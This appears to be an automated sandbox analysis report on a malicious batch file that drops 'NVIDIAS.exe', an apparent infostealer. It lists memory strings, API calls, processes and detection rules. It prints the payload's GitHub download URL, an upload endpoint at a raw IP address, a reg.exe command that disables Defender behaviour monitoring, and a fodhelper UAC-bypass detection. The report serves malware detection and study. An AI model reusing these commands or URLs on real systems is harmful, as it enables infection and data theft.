Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.100.233:1490/uploadt
Source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070701000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001F.00000002.2120814233.0000020FFFE43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: edb.log.31.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: qmgr.db.31.dr	String found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
Source: qmgr.db.31.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
Source: qmgr.db.31.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
Source: qmgr.db.31.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
Source: qmgr.db.31.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
Source: NVIDIAS.exe, 00000015.00000002.1211552513.0000000003598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: qmgr.db.31.dr	String found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
Source: qmgr.db.31.dr	String found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
Source: qmgr.db.31.dr	String found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
Source: Amcache.hve.39.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.31.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://gemini.google.com/app?q=
Source: 3gJQoqWpxb.bat	String found in binary or memory: https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe
Source: tmp44F5.tmp.dat.21.dr	String found in binary or memory: https://login.live.com/
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.dr	String found in binary or memory: https://login.live.com//
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.dr	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.dr	String found in binary or memory: https://login.live.com/v104
Source: qmgr.db.31.dr	String found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
Source: svchost.exe, 0000001F.00000002.2121093830.0000020FFFE94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44F4.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: NVIDIAS.exe, 00000015.00000002.1214141492.000000000477C000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000479D000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047BE000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004742000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 140.82.113.4:443 -> 192.168.11.20:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.11.20:49708 version: TLS 1.2

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 3gJQoqWpxb.bat, type: SAMPLE

Matched rule: detects Windows exceutables potentially bypassing UAC using fodhelper.exe Author: ditekSHen

PE file contains section with special chars

Source: NVIDIAS.exe.20.dr	Static PE information: section name: .+,2
Source: NVIDIAS.exe.20.dr	Static PE information: section name: .>h"

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\QQQ\NVIDIAS.exe

Jump to dropped file

Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534300 NtOpenFile,	21_2_03534300
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_035343D8 NtCreateSection,	21_2_035343D8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533A28 NtClose,	21_2_03533A28
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534738 NtDeviceIoControlFile,	21_2_03534738
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533FB8 NtAllocateVirtualMemory,	21_2_03533FB8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534670 NtQueryVolumeInformationFile,	21_2_03534670
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533EE0 NtProtectVirtualMemory,	21_2_03533EE0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534580 NtMapViewOfSection,	21_2_03534580
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_035343D0 NtCreateSection,	21_2_035343D0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533A21 NtClose,	21_2_03533A21
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_035342F9 NtOpenFile,	21_2_035342F9
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534731 NtDeviceIoControlFile,	21_2_03534731
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533FB0 NtAllocateVirtualMemory,	21_2_03533FB0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534669 NtQueryVolumeInformationFile,	21_2_03534669
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533EBF NtProtectVirtualMemory,	21_2_03533EBF
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534578 NtMapViewOfSection,	21_2_03534578

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Code function: 21_2_03534738: NtDeviceIoControlFile,

21_2_03534738

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033AB258	21_2_033AB258
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033AD800	21_2_033AD800
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A1098	21_2_033A1098
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A96D0	21_2_033A96D0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033ABED0	21_2_033ABED0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A8D08	21_2_033A8D08
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A9368	21_2_033A9368
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A9358	21_2_033A9358
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A0A70	21_2_033A0A70
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033AB980	21_2_033AB980
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A1089	21_2_033A1089
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A9F88	21_2_033A9F88
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A9E38	21_2_033A9E38
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A9E28	21_2_033A9E28
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A9621	21_2_033A9621
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_033A8CFA	21_2_033A8CFA
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03531B10	21_2_03531B10
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0353C978	21_2_0353C978
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533180	21_2_03533180
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0353E061	21_2_0353E061
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03538778	21_2_03538778
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534FC0	21_2_03534FC0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03530648	21_2_03530648
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03532DF1	21_2_03532DF1
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03535C90	21_2_03535C90
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0353F4AB	21_2_0353F4AB
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03538A20	21_2_03538A20
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_035332E0	21_2_035332E0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0353C95D	21_2_0353C95D
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03533171	21_2_03533171
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03535070	21_2_03535070
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03534810	21_2_03534810
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0353F4AB	21_2_0353F4AB
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_035317B0	21_2_035317B0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03530638	21_2_03530638
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03537C70	21_2_03537C70
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03537C60	21_2_03537C60
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_03536C90	21_2_03536C90
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D431C0	21_2_05D431C0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D46140	21_2_05D46140
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D4A4D0	21_2_05D4A4D0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D4A0D0	21_2_05D4A0D0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D42C80	21_2_05D42C80
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D42068	21_2_05D42068
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D4F030	21_2_05D4F030
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D4AC20	21_2_05D4AC20
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D437E0	21_2_05D437E0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D497E8	21_2_05D497E8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D423B0	21_2_05D423B0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D44B38	21_2_05D44B38
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D455C8	21_2_05D455C8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D439B0	21_2_05D439B0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D489B8	21_2_05D489B8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D437D1	21_2_05D437D1
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D497D8	21_2_05D497D8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D4A700	21_2_05D4A700
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D46140	21_2_05D46140
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D43A17	21_2_05D43A17
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_05D43A30	21_2_05D43A30
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731F730	21_2_0731F730
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07315740	21_2_07315740
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731A7B2	21_2_0731A7B2
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07312BA3	21_2_07312BA3
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07312788	21_2_07312788
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731DBC1	21_2_0731DBC1
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07319238	21_2_07319238
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07312278	21_2_07312278
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07313668	21_2_07313668
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_073146B0	21_2_073146B0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07314E98	21_2_07314E98
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731C689	21_2_0731C689
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731C2EE	21_2_0731C2EE
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731F6C0	21_2_0731F6C0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731E178	21_2_0731E178
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731D868	21_2_0731D868
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07310040	21_2_07310040
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731F0A0	21_2_0731F0A0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_073124A8	21_2_073124A8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07310B67	21_2_07310B67
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731F768	21_2_0731F768
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07314340	21_2_07314340
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07313E61	21_2_07313E61
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07319298	21_2_07319298
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731D851	21_2_0731D851
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0731F05F	21_2_0731F05F
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07641468	21_2_07641468
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07641D70	21_2_07641D70
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07643F70	21_2_07643F70
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07648A78	21_2_07648A78
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07640040	21_2_07640040
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07642F48	21_2_07642F48
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0764F921	21_2_0764F921
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07643500	21_2_07643500
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07647508	21_2_07647508
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07643A19	21_2_07643A19
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_076427C9	21_2_076427C9
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_076459A8	21_2_076459A8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07645161	21_2_07645161
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07641451	21_2_07641451
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07640720	21_2_07640720
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_07640006	21_2_07640006
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0764FB18	21_2_0764FB18
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0764A7F8	21_2_0764A7F8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0764A7AA	21_2_0764A7AA
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08307020	21_2_08307020
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08307C58	21_2_08307C58
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08300040	21_2_08300040
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083064B9	21_2_083064B9
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08306898	21_2_08306898
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08303578	21_2_08303578
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083065BA	21_2_083065BA
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08306DA0	21_2_08306DA0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083051D8	21_2_083051D8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830BE38	21_2_0830BE38
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830DE41	21_2_0830DE41
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083066FE	21_2_083066FE
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830CF38	21_2_0830CF38
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830DB69	21_2_0830DB69
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08308B58	21_2_08308B58
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083027C0	21_2_083027C0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830B890	21_2_0830B890
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830B880	21_2_0830B880
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830208A	21_2_0830208A
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830A4D2	21_2_0830A4D2
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08306D9A	21_2_08306D9A
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830C5F8	21_2_0830C5F8
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830C5DD	21_2_0830C5DD
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083079C0	21_2_083079C0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08305A2F	21_2_08305A2F
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08305E13	21_2_08305E13
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830561D	21_2_0830561D
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08308E7A	21_2_08308E7A
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_0830775D	21_2_0830775D
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083027B0	21_2_083027B0
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08303790	21_2_08303790
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_08307B98	21_2_08307B98
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Code function: 21_2_083093AA	21_2_083093AA

Source: C:\Windows\System32\conhost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1

Source: 3gJQoqWpxb.bat, type: SAMPLE

Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_fodhelper author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using fodhelper.exe

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@66/35@4/5

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Code function: 21_2_07640040 CreateToolhelp32Snapshot,

21_2_07640040

Source: C:\ProgramData\QQQ\NVIDIAS.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8816:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:304:WilStaging_02
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess716

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5esurz3.4we.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" "

Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecurityHealthSystray.exe")
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 716)

Source: C:\ProgramData\QQQ\NVIDIAS.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\cacls.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

